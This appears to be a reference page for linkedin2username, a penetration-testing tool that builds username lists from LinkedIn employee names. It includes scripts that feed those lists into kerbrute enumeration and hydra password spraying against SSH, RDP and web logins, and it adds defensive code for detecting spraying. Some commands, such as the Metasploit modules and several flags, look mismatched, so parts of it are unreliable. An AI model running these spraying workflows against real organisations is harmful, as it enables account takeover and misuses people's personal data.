linkedin2username
Overview
linkedin2username is a tool that generates potential username lists from LinkedIn company employee data. During authorized penetration testing and security research, it helps identify valid usernames for targeted environments by analyzing publicly available employee information. The tool supports multiple naming conventions (firstname.lastname, firstnamelastname, flastname, etc.) and integrates with credential enumeration workflows for authorized security testing.
Installation
```bash
# Clone from GitHub
git clone https://github.com/initstring/linkedin2username.git
cd linkedin2username
# Install dependencies
pip3 install -r requirements.txt
# Make executable
chmod +x linkedin2username.py
```

```bash
# Clone repository
git clone https://github.com/initstring/linkedin2username.git
cd linkedin2username
# Install with pip
pip3 install -r requirements.txt
# Create symlink for easy access
sudo ln -s "$(pwd)/linkedin2username.py" /usr/local/bin/linkedin2username
```
Windows
```bash
# Clone repository
git clone https://github.com/initstring/linkedin2username.git
cd linkedin2username
# Install dependencies
pip install -r requirements.txt
# Run with Python
python linkedin2username.py
```
Kali Linux
```bash
# Clone and install
git clone https://github.com/initstring/linkedin2username.git
cd linkedin2username
pip3 install -r requirements.txt
# Or install via apt
apt-get install linkedin2username
```
Basic Usage
Simple Username Generation

| Command | Description |
|---|---|
| `python3 linkedin2username.py -c "Company Name"` | Generate usernames from company employees |
| `python3 linkedin2username.py -c "Company" -f firstname.lastname` | Custom format output |
| `python3 linkedin2username.py -c "Company" -o output.txt` | Save to file |
| `python3 linkedin2username.py -l employees.txt` | Use local HTML file |
Common Scenarios
```bash
# Basic usage with company name
python3 linkedin2username.py -c "Acme Corporation"
# Save output to file
python3 linkedin2username.py -c "Acme" > usernames.txt
# Multiple companies
python3 linkedin2username.py -c "Company1" > company1.txt
python3 linkedin2username.py -c "Company2" > company2.txt
cat company*.txt > all_users.txt
# Use with other tools
python3 linkedin2username.py -c "Target" | tee target_users.txt
```
Output Formats
Available Naming Conventions
```bash
# firstname.lastname (John.Smith)
python3 linkedin2username.py -c "Company" -f "firstname.lastname"
# firstnamelastname (JohnSmith)
python3 linkedin2username.py -c "Company" -f "firstnamelastname"
# first.last (j.smith)
python3 linkedin2username.py -c "Company" -f "first.last"
# firstlast (jsmith)
python3 linkedin2username.py -c "Company" -f "firstlast"
# first_last (john_smith)
python3 linkedin2username.py -c "Company" -f "first_last"
# Custom format with initials
python3 linkedin2username.py -c "Company" -f "firstinitial.lastname"
```
Format Examples
```bash
# Given: John Smith
# Format 1: firstname.lastname → john.smith
# Format 2: firstnamelastname → johnsmith
# Format 3: first.last → j.smith
# Format 4: firstlast → jsmith
# Format 5: first_last → john_smith
# Format 6: flastname → jsmith
# Format 7: first → john
# Format 8: last → smith
```
Data Collection Methods
Using LinkedIn Company Pages
```bash
# Method 1: Manual data extraction
# 1. Navigate to company LinkedIn page
# 2. Search for "current employees"
# 3. Export/copy employee list
# 4. Save as employees.txt

# Method 2: Using LinkedIn API (if available)
# Requires LinkedIn authentication
# Limited by terms of service
python3 linkedin2username.py -c "Company" --auth username:password
```
Scraping Employee Data
```bash
# Using browser automation
# Save LinkedIn search results to HTML

# Option 1: Manual browser export
# 1. Open LinkedIn company page
# 2. Scroll through employees
# 3. Right-click → Save as... (employees.html)
# 4. Use with linkedin2username
python3 linkedin2username.py -l employees.html -c "Company"

# Option 2: Using Selenium (if supported)
# Automates LinkedIn data extraction
```
Working with Existing Data
```bash
# If you have employee list in text format
cat << 'EOF' > employees.txt
John Smith
Jane Doe
Bob Johnson
Alice Williams
EOF
# Convert to usernames
python3 linkedin2username.py -i employees.txt -f "firstlast"
```
Advanced Techniques
Multiple Format Generation
```bash
#!/bin/bash
# Generate all common username formats
COMPANY="Acme"
FORMATS=(
  "firstname.lastname"
  "firstnamelastname"
  "first.last"
  "firstlast"
  "first_last"
  "flastname"
)
for format in "${FORMATS[@]}"; do
  echo "[*] Generating format: $format"
  python3 linkedin2username.py -c "$COMPANY" -f "$format" \
    >> "${COMPANY}_${format}.txt"
done
# Combine and deduplicate
cat "${COMPANY}"_*.txt | sort -u > "${COMPANY}_all_usernames.txt"
```
Integrating with Credential Enumeration
```bash
# Generate usernames
python3 linkedin2username.py -c "Target" -f "firstlast" > usernames.txt
# Prepare for password spraying
# Create user:password combinations
while read -r username; do
  echo "${username}:Password123"
done < usernames.txt > credentials.txt
# Use with hydra
hydra -L usernames.txt -P passwords.txt \
  -t 4 ssh://192.168.1.10
# Use with kerbrute
kerbrute userenum --dc 192.168.1.10 -d domain.local usernames.txt
```
Email Address Generation
```bash
# From linkedin2username usernames, generate email addresses
# Assuming company domain is company.local
while read -r username; do
  echo "${username}@company.local"
done < usernames.txt > emails.txt
# Generate variations
while read -r username; do
  echo "${username}@company.local"
  echo "${username}@company.com"
  echo "${username}@mail.company.local"
done < usernames.txt | sort -u > emails_all.txt
```
Data Processing and Analysis
Filtering Results
```bash
# Remove duplicates
sort -u usernames.txt > usernames_unique.txt
# Filter by pattern
grep "^[a-z]\." usernames.txt > firstname_initial.txt
# Count occurrences
cat usernames.txt | wc -l
# Find most common first names
cut -d'.' -f1 usernames.txt | sort | uniq -c | sort -rn
# Identify potential service accounts
grep -i "svc\|service\|admin\|test" usernames.txt
```
Creating Target Lists
```bash
# Extract usernames only
python3 linkedin2username.py -c "Company" -f "firstlast" | \
  awk '{print $1}' > targets.txt
# Create username frequency list
cat usernames.txt | sort | uniq -c | sort -rn > frequency.txt
# Identify common username patterns
cat usernames.txt | sed 's/[0-9]//g' | sort | uniq -c > pattern_analysis.txt
```
Integration with Penetration Testing Tools
Kerbrute Username Enumeration
```bash
# Generate usernames
python3 linkedin2username.py -c "Target" -f "firstlast" > usernames.txt
# Use kerbrute to find valid AD usernames
kerbrute userenum --dc 192.168.1.10 \
  -d domain.local usernames.txt
# Output valid usernames
kerbrute userenum --dc 192.168.1.10 \
  -d domain.local usernames.txt -o valid_users.txt
```
Hydra Password Spraying
```bash
# Generate usernames with format suitable for hydra
python3 linkedin2username.py -c "Target" -f "firstlast" > users.txt
# Create password list
echo "Password123" > passes.txt
echo "Welcome2026" >> passes.txt
# SSH password spray
hydra -L users.txt -P passes.txt \
  -t 4 -f ssh://192.168.1.100
# HTTP/HTTPS
hydra -L users.txt -P passes.txt \
  -t 4 -f http-post-form://target.com/login
# RDP
hydra -L users.txt -P passes.txt \
  -t 4 -f rdp://192.168.1.200
```
Metasploit Integration
```bash
# Generate username list
python3 linkedin2username.py -c "Target" > usernames.txt
# Use in Metasploit for credential testing
msfconsole
# Load module for enumeration
use auxiliary/scanner/snmp/snmp_enum_users
# Or use with auxiliary SSH scanner
use auxiliary/scanner/ssh/ssh_version
# Set options
set USER_AS_PASS true
set RHOSTS 192.168.1.0/24
```
Custom Scripting
```bash
#!/bin/bash
# Integrated username generation and validation
COMPANY="Target"
DOMAIN="domain.local"
DC_IP="192.168.1.10"
echo "[*] Generating LinkedIn usernames for $COMPANY"
python3 linkedin2username.py -c "$COMPANY" -f "firstlast" > users_temp.txt
echo "[*] Validating usernames against AD..."
kerbrute userenum --dc "$DC_IP" -d "$DOMAIN" users_temp.txt -o valid_users.txt
echo "[*] Valid users found:"
cat valid_users.txt
echo "[*] Attempting to crack passwords..."
hydra -L valid_users.txt -P /usr/share/wordlists/rockyou.txt \
  -t 4 "ssh://$DC_IP"
# Cleanup
rm users_temp.txt
```
Privacy and Legal Considerations
Authorized Data Collection
```bash
# LinkedIn terms of service restrictions
# - Scraping violates LinkedIn ToS in most regions
# - Alternative: Use LinkedIn's official recruiter tools
# - For pen tests: Only use with written authorization
# - Must define scope: which companies/departments

# Documentation template
echo "LinkedIn2Username Authorization"
echo "Target Company: ACME Corporation"
echo "Scope: Current employees only"
echo "Purpose: Authorized penetration test"
echo "Duration: 2026-05-02 to 2026-05-15"
echo "Approval: [Manager Signature]"
```
Ethical Usage Guidelines
```bash
# Responsible username generation
# 1. Only generate from authorized company
# 2. Use only within authorized test scope
# 3. Don't share usernames outside test team
# 4. Report findings securely
# 5. Cleanup and document usage

# Example report
cat << 'EOF' > engagement_report.txt
LinkedIn2Username Analysis Report
Target: ACME Corporation
Date: 2026-05-02
Scope: Authorized security testing
Findings:
- 542 LinkedIn employees identified
- 4 naming convention variations tested
- 267 unique username formats generated
- 89 valid AD usernames confirmed (via kerbrute)
- 12 accounts with weak/default passwords
Recommendations:
- Implement username policy controls
- Deploy MFA across all accounts
- Monitor for failed authentication attempts
- Review LinkedIn visibility policies
EOF
```
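For the "Monitor for failed authentication attempts" recommendation, the following added example (not part of the original page or of linkedin2username) flags a source that fails against many distinct usernames inside a short window, which is the pattern a generated username list produces. The log-line format, the `spray_sources` function, the thresholds and the sample events are all constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed log format for this example; adapt the regex to your auth logs.
LINE = re.compile(r"(\S+) src=(\S+) user=(\S+) result=(OK|FAIL)")
USERS = ["jsmith", "jdoe", "bjohnson", "awilliams", "mgarcia", "tlee"]
# Constructed events: .5 fails on six users in seconds, .9 retries one user,
# .7 fails on five users but hours apart.
SAMPLE = (
    [f"2026-05-02T10:00:0{i}Z src=10.0.0.5 user={u} result=FAIL" for i, u in enumerate(USERS)]
    + [f"2026-05-02T10:01:0{i}Z src=10.0.0.9 user=jdoe result=FAIL" for i in range(6)]
    + [f"2026-05-02T1{i}:30:00Z src=10.0.0.7 user={u} result=FAIL" for i, u in enumerate(USERS[:5])]
)


def parse(lines):
    """Yield (timestamp, source, username, result) for lines matching LINE."""
    for line in lines:
        m = LINE.match(line)
        if m:
            yield datetime.strptime(m[1], "%Y-%m-%dT%H:%M:%SZ"), m[2], m[3].lower(), m[4]


def spray_sources(lines, window=timedelta(minutes=5), min_users=5):
    """Map source -> peak number of distinct usernames that failed inside one window."""
    fails = defaultdict(list)
    for ts, src, user, result in parse(lines):
        if result == "FAIL":
            fails[src].append((ts, user))
    flagged = {}
    for src, events in fails.items():
        events.sort()
        seen, start, peak = Counter(), 0, 0
        for ts, user in events:
            seen[user] += 1
            while ts - events[start][0] > window:  # expire events older than the window
                old = events[start][1]
                seen[old] -= 1
                if seen[old] == 0:
                    del seen[old]
                start += 1
            peak = max(peak, len(seen))
        if peak >= min_users:
            flagged[src] = peak
    return flagged


print(spray_sources(SAMPLE))
```

Counting distinct usernames rather than raw failures keeps a single user retrying a forgotten password (10.0.0.9 in the sample) from being flagged, and the window keeps slow, unrelated failures (10.0.0.7) below the threshold.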
Troubleshooting
No Results Generated
```bash
# Company name not found
# Solution: Try variations
python3 linkedin2username.py -c "ACME"
python3 linkedin2username.py -c "Acme Corp"
python3 linkedin2username.py -c "ACME Corporation"
# Verify format string
python3 linkedin2username.py -c "Company" -h
# Check available format options
# Debug output
python3 linkedin2username.py -c "Company" -v
```
Format Issues
```bash
# Special characters in names
# Solution: Script handles most cases, but verify output
python3 linkedin2username.py -c "Company" -f "firstlast" | head -20
# Numbers in names (Jr., II, III)
# These may be stripped depending on format
grep "[0-9]" usernames.txt
# Hyphenated names
# May be handled as single or separate
grep "\-" usernames.txt
```
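The format list under "Format Examples" and the edge cases above (accents, suffixes, hyphenated names) can be checked against your own directory. This added example is not code from the page or from linkedin2username: it normalizes display names, applies five of the page's formats, and reports what fraction of an account list is derivable from public staff names. The normalization rules, the suffix list, `split_name`, `convention_coverage` and the sample data are assumptions made for illustration.

```python
import re
import unicodedata

# Format names and outputs follow the page's "Format Examples" list.
FORMATS = {
    "firstname.lastname": lambda f, l: f"{f}.{l}",
    "firstnamelastname": lambda f, l: f"{f}{l}",
    "first.last": lambda f, l: f"{f[0]}.{l}",
    "firstlast": lambda f, l: f"{f[0]}{l}",
    "first_last": lambda f, l: f"{f}_{l}",
}
SUFFIXES = {"jr", "sr", "ii", "iii", "iv"}  # assumption: suffixes to drop

# Constructed sample data.
PUBLIC_NAMES = ["John Smith", "José García-López III", "Mary-Anne O'Neil, PhD", "Cher"]
ACCOUNTS = ["jsmith", "jgarcialopez", "moneil", "svc-backup"]


def split_name(display_name):
    """Return (first, last) as lowercase ASCII, or None for single-word names."""
    # Fold accents ("José" -> "Jose") and drop post-comma credentials (", PhD").
    text = unicodedata.normalize("NFKD", display_name)
    text = text.encode("ascii", "ignore").decode().lower().split(",")[0]
    parts = [re.sub(r"[^a-z-]", "", p) for p in text.split()]
    parts = [p for p in parts if p and p not in SUFFIXES]
    if len(parts) < 2:
        return None
    # Assumption: hyphenated names are joined ("garcia-lopez" -> "garcialopez").
    return parts[0].replace("-", ""), parts[-1].replace("-", "")


def convention_coverage(public_names, accounts):
    """Per format, the fraction of accounts derivable from the public names."""
    known = {a.lower() for a in accounts}
    names = [n for n in map(split_name, public_names) if n]
    coverage = {}
    for fmt, build in FORMATS.items():
        derived = {build(first, last) for first, last in names}
        coverage[fmt] = len(derived & known) / len(known) if known else 0.0
    return coverage


print(convention_coverage(PUBLIC_NAMES, ACCOUNTS))
```

A high value for one format means account names in that directory are predictable from public profiles, which is the input for the "Implement username policy controls" recommendation.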
Integration Problems
```bash
# Kerbrute not finding users
# Verify usernames match domain format
# Try different formats
python3 linkedin2username.py -c "Company" -f "first.last"
kerbrute userenum --dc dc.domain.local -d domain.local users.txt
# Password spraying timeout
# Reduce thread count
hydra -L users.txt -P pass.txt -t 2 ssh://target
# Check for account lockout policies
# Adjust spray rate accordingly
```
Performance Optimization
Processing Large Lists
```bash
# For 5000+ employees
# Split into smaller batches
split -l 1000 large_usernames.txt batch_
# Process in parallel, writing each batch's results to its own file
for batch in batch_*; do
  kerbrute userenum --dc dc.domain.local \
    -d domain.local "$batch" -o "valid_${batch}.txt" &
done
wait
# Combine results
cat valid_*.txt > all_valid_users.txt
```
Caching Results
```bash
# Save generated usernames for reuse
python3 linkedin2username.py -c "Company" -f "firstlast" \
  > "company_usernames_$(date +%Y%m%d).txt"
# Search cache for existing lists
ls company_usernames_*.txt
grep "john" company_usernames_*.txt
```
References
- linkedin2username GitHub Repository
- LinkedIn Terms of Service
- Kerbrute User Enumeration
- Hydra Password Spraying
- OSINT Techniques for Penetration Testing
- Authorized Security Testing Guidelines
- Social Engineering Attacks
- MITRE ATT&CK T1589 Gather Victim Identity Information